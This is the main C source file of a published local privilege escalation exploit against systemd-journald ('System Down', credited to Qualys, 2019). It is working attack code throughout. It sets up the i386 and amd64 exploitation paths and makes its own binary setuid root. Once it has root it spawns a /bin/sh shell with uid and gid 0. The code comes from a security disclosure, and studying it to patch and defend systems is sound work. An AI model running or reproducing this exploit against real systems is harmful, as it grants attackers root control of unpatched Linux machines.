/*
 * System Down: A systemd-journald exploit
 * https://www.qualys.com/2019/01/09/system-down/system-down.txt
 * gcc -std=gnu99 -Wall -Wextra -Werror -o exploit *.c
 * Copyright (C) 2019 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

#include <errno.h>
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

#include "exploit.h"
#include "infoleak.h"
#include "macro.h"
#include "target.h"
#include "wall.h"

static bool
is_setuid_program(const char * const program, const bool is_self)
{
    if (!program) die();

    struct stat st = { 0 };
    if (lstat(program, &st)) {
        if (is_self) die();
        return false;
    }
    if (!S_ISREG(st.st_mode)) die();
    if (!(st.st_mode & S_ISUID)) return false;

    static char command[PATH_MAX];
    xsnprintf(command, sizeof(command), "ls -l '%s' 2>/dev/null", program);
    system(command);
    return true;
}

bool
exploit_has_succeeded(const char * const self)
{
    if (!self) die();
    bool success = is_setuid_program(self, true);

    static char buf[PATH_MAX];
    xsnprintf(buf, sizeof(buf), "%s", SETUID_SHELLS);
    const char * program = buf;
    for (;;) {
        if (*program != '/') die();
        char * const space = strchr(program, ' ');
        if (space) *space = '\0';
        success |= is_setuid_program(program, false);
        if (!space) break;
        program = space + 1;
    }
    return success;
}

int
main(const int argc, char * const argv[])
{
    static char self[PATH_MAX];
  {
    const ssize_t len = readlink("/proc/self/exe", self, sizeof(self));
    if (len <= 0) die();
    if ((size_t)len >= sizeof(self)) die();
    if (self[len] != '\0') die();
    if (self[0] != '/') die();
    if (strpbrk(self, "\\'\n")) die();
  }

    if (getuid() == 0) {
        if (geteuid() != 0) die();
        if (chown(self, 0, -1)) die();
        if (chmod(self, 04755)) die();
        exit(EXIT_SUCCESS);
    }

    setlinebuf(stdout);
    puts("");
    puts("System Down: A systemd-journald exploit");
    puts("https://www.qualys.com/2019/01/09/system-down/system-down.txt");
    puts("Copyright (C) 2019 Qualys, Inc.");
    puts("");

    if (geteuid() == 0) {
        if (setuid(0)) die();
        if (setgid(0)) die();
        static char * const argv[] = { "/bin/sh", NULL };
        execv(argv[0], argv);
        die();
    }

    struct timeval tv;
    if (gettimeofday(&tv, NULL)) die();
    srandom(getpid() ^ tv.tv_sec ^ tv.tv_usec);

    initialize_target();
    if (exploit_has_succeeded(self)) die();

    int opt;
    size_t data_size_max = 0;
    while ((opt = getopt(argc, argv, "d:w")) != -1) {
        switch (opt) {
        case 'd':
            if (target_arch() != TARGET_AMD64) die();
            errno = 0;
            char * end = NULL;
            data_size_max = strtoul(optarg, &end, 0);
            if (errno || end <= optarg || *end) die();
            break;
        case 'w':
            initialize_wall();
            break;
        default:
            die();
        }
    }
    if (optind != argc) die();

    initialize_infoleak();
    switch (target_arch()) {
    case TARGET_I386:
        exploit_i386(self);
        break;
    case TARGET_AMD64:
        exploit_amd64(self, data_size_max);
        break;
    }
    die();
}

